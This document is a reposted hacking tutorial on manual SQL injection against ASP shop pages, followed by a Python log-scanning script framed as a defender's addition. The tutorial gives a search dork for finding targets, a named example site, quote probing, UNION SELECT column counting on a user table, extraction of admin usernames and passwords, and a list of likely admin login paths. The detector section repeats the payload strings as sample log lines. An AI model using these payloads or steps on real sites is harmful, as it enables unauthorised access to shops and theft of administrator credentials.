A foreign article on manual injection
Quoted content
BEGIN
First go to google.com and put this
inurl:/shopdisplayproducts.asp
Ok, now we find some site with shopdisplayproducts.asp
Let's see some site
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
ok ... now we put this sign on the end of the link '
now the link looks like this
http://www.globalasp.org.uk/store/shopdisp....asp?id=14'
And we get ERROR
Products
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.
/store/shop$db.asp, line 467
If we see this error then it is HACKABLE !!!
Ok ... now we removed '
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
and on this add this
%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20tbluser'
Link now is
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
And put it in the browser we get the same error !!!
Ok ... now you see these numbers ...
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
Now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
The same error, and now we remove and remove numbers, and when we don't see this error we must see some site; on this server the correct number for exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> THIS YOU SEE 47 is the END NUMBER
Ok now we put this in browser and don't see ERROR we see some LAPTOPs
Ok ... now we find on that site numbers 3 and 4
They are small
When we find those numbers we put this code line in the link where 3 and 4 are
fldusername,fldpassword
Now the exploitable link is this
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
and look, where the numbers 3 and 4 were there are now the username and password for login in SHOPADMIN, now we are going to this link
http://www.globalasp.org.uk/store/colours$config.asp
there is LOGIN for shopadmin and we login !!!
THESE ARE PATHS WHERE SHOPADMIN CAN BE TOO
shopadmin.asp ----> THIS or ... WITH 1
shopadmin1.asp ----> THIS IS IN 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
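
A defender's view of the requests described in this post, as an added example that is not part of the original post: a Python scan of web access-log lines that flags `id` values on `shopdisplayproducts.asp` that are not plain integers and labels which probe stage they resemble. The log layout (client, method, target, status), the rule names and the sample lines are constructed for illustration; the page, table and column names are the ones quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# One rule per probe stage from the post; rule names are made up for this example.
RULES = [
    ("quote_probe", re.compile(r"'\s*$")),                      # trailing ' on id
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column_count_probe", re.compile(r"select\s+\d+(\s*,\s*\d+){3,}", re.I)),
    ("credential_columns", re.compile(r"\bfld(username|password)\b", re.I)),
]

def classify_id(raw_value):
    """Return the rule names matched by one id value ([] when it is a plain integer)."""
    value = unquote(raw_value)  # second decode catches double-encoded input
    if re.fullmatch(r"\d{1,9}", value):
        return []
    hits = [name for name, rx in RULES if rx.search(value)]
    return hits or ["non_numeric_id"]

def scan(log_lines, page="shopdisplayproducts.asp"):
    """Yield (client, rule names) for every suspicious id sent to the product page."""
    findings = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # not in the constructed "client method target status" layout
        client, target = parts[0], parts[2]
        url = urlsplit(target)
        if not url.path.lower().endswith(page):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "id" and classify_id(value):
                findings.append((client, classify_id(value)))
    return findings

# Constructed sample lines (documentation IP ranges, shortened column list).
SAMPLE_LOG = [
    "198.51.100.7 GET /store/shopdisplayproducts.asp?id=14 200",
    "203.0.113.9 GET /store/shopdisplayproducts.asp?id=14' 500",
    "203.0.113.9 GET /store/shopdisplayproducts.asp?id=14%20union%20select%201,2,3,4,5%20from%20tbluser' 500",
    "203.0.113.9 GET /store/shopdisplayproducts.asp?id=14%20union%20select%201,2,fldusername,fldpassword,5%20from%20tbluser' 200",
    "198.51.100.7 GET /store/shopdisplayproducts.asp?id=abc 200",
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, ",".join(hits))
```

The same digits-only check, applied in the application before the query string is built, rejects every request this scan flags.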